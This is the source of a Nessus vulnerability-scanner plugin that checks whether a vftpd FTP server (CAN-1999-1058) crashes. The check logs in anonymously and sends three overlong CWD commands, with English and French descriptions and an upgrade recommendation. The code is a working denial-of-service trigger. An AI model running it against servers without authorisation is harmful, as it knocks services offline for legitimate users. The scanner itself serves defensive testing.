home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / vftpd_overflow.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  112 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  4. #
  5. # See the Nessus Scripts License for details
  6. #
  7.  
  8. if(description)
  9. {
  10.  script_id(10293);
  11.  script_bugtraq_id(818);
  12.  script_version ("$Revision: 1.18 $");
  13.  script_cve_id("CAN-1999-1058");
  14.  
  15.  name["english"] = "vftpd buffer overflow";
  16.  name["francais"] = "DΘpassement de buffer dans vftpd";
  17.  
  18.  script_name(english:name["english"],
  19.           francais:name["francais"]);
  20.          
  21.  desc["english"] = "
  22. It was possible to make the remote FTP server crash
  23. by issuing the commands :
  24.  
  25.     CWD <buffer>
  26.     CWD <buffer>
  27.     CWD <buffer>
  28.  
  29. Where <buffer> is longer than 504 chars.    
  30.  
  31. An attacker can use this problem to prevent your FTP server
  32. from working properly, thus preventing legitimate
  33. users from using it.
  34. Solution : upgrade your FTP to the latest version, 
  35. or change it. 
  36.  
  37. Risk factor : Medium";
  38.          
  39.          
  40. desc["francais"] = "
  41. Il s'est avΘrΘ possible de faire planter le serveur
  42. FTP distant en lui envoyant les commandes :
  43.  
  44.     CWD <buffer>
  45.     CWD <buffer>
  46.     CWD <buffer>
  47.  
  48. O∙ <buffer> fait plus de 504 caractΦres.
  49.  
  50. Un pirate peut utiliser ce problΦme pour empecher
  51. votre service FTP de fonctionner et ainsi de servir
  52. des clients lΘgitimes.
  53. Solution : mettez α jour votre serveur FTP, ou
  54. changez-le.
  55.  
  56.        
  57. Facteur de risque : Moyen";
  58.               
  59.  script_description(english:desc["english"],
  60.              francais:desc["francais"]);
  61.             
  62.  
  63.  script_summary(english:"Checks if the remote ftp can be buffer overflown",
  64.          francais:"DΘtermine si le serveur ftp distant peut etre soumis a un dΘpassement de buffer");
  65.  script_category(ACT_DESTRUCTIVE_ATTACK);
  66.  script_family(english:"FTP", francais:"FTP");
  67.  
  68.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  69.            francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  70.           
  71.  script_dependencie("find_service.nes", "ftp_anonymous.nasl");
  72.  script_require_keys("ftp/login");
  73.  script_require_ports("Services/ftp", 21);
  74.  exit(0);
  75. }
  76.  
  77. #
  78. # The script code starts here : 
  79. #
  80.  
  81.  
  82. login = get_kb_item("ftp/login");
  83. pass  = get_kb_item("ftp/password");
  84.  
  85. if(!login)exit(0);
  86.  
  87.  
  88.  
  89. port = get_kb_item("Services/ftp");
  90. if(!port)port = 21;
  91.  
  92. if(!get_port_state(port))exit(0);
  93. # Connect to the FTP server
  94. soc = open_sock_tcp(port);
  95. if(soc)
  96. {
  97.  domain = ereg_replace(pattern:"[^\.]*\.(.*)",
  98.                 string:get_host_name(),
  99.                replace:"\1");    
  100.                
  101.  if(ftp_log_in(socket:soc, user:"anonymous", pass:string("nessus@", domain)))
  102.  {
  103.   crp = crap(504);
  104.   c = string("CWD ", crp, "\r\n");
  105.   send(socket:soc, data:c) x 3;
  106.   close(soc);
  107.   soc2 = open_sock_tcp(port);
  108.   if(!soc2)security_warning(port);
  109.   else close(soc2);
  110.  }
  111. }
  112.